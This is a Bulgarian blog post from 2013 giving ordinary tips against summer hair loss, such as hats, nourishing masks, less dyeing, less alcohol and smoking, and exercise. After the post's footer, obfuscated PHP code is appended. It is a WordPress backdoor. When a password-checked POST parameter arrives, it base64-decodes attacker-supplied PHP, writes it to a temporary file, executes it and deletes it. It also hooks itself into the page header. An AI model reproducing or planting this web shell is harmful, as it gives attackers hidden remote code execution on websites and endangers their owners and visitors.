Мерки за подхранване на косата през лятото | Косопад

Интензивни мерки срещу летен косопад

косопад през лятото

Летен косопад – предпазване

След дълго очакване лятото най – накрая чука на врата. Заедно с топлото време обаче за косата идват тежки дни, през които много лесно може да изпаднем в състояние на косопад. В повечето случаи само от нас зависи дали ще си създаваме излишни тревоги или ще продължаваме да се радваме на хубава прическа.

Отдавна известен факт е, че лятото е време, през което косата е най – податлива на косопад. За да се предпазим е препоръчително да спазваме няколко полезни съвета, които могат да ни спестят купища неприятности, висене с часове по лекарските кабинети и необосновано високи разходи за лекарствени средства.

Преди всичко, в никакъв случай не трябва да допускаме дехидратация на косата. Когато космите изсъхнат стават много податливи на счупване и така лесно може да се стигне до косопад. Препоръчително е да използвате шапки с широка периферия при разходките в жегата, както и да третирате с подходящи подхранващи маски от народната медицина.

Също така, бъдете много внимателни с разкрасителните процедури като боядисване, къдрене или изправяне. Химическите препарати въздействат пагубно върху космите, разрушават техния защитен слой и предизвикват силна дехидратация. За да се предпазите от косопад, боядисвайте най – много един път в месеца.

Лятото е време за купон, нали? Да, но алкохолът, безсънието и цигарите са сред най – големите врагове на косата и са огромни предпоставки за косопад. Никой не е казал, че трябва да се затворите като монахини в домовете си, но все пак внимавайте. Защото прекаляването с купоните и ежедневният стрес в модерна България вървят ръка за ръка, тялото не може да се възстанови и не след дълго настъпва срив в имунната система.

Правете дълги разходки сред природата, спортувайте, плувайте и бягайте. Движението стимулира работата на сърцето и кръвообращението, което е силна превантивна мярка срещу косопад.

07. юни 2013 21:34:48 от Косопад
Категории: Любопитно за косопада | Етикети: , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}